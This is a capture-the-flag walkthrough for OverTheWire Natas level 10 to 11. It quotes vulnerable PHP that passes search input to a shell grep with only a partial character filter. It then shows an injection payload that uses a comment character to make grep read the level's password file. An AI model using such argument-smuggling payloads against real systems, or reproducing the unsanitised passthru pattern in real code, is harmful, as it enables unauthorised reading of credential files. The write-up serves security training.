OverTheWire: Natas

Level 10 > Level 11



<div id="content">

For security reasons, we now filter on certain characters<br/><br/>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>

$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>

Same as the previous challenge but now we are forbidden to use a semicolon, pipe, or ampersand.

In this case, instead of breaking out of the command we’ll try to craft it to do what we want itself. By using a comment character we can eliminate dictionary.txt and insert our own choice of file. To be sure it will match, we’ll search for any letter or number.

Our injection…

[a-z0-9] /etc/natas_webpass/natas11 #

The command as executed by the system…

grep -i [a-z0-9] /etc/natas_webpass/natas11 # dictionary.txt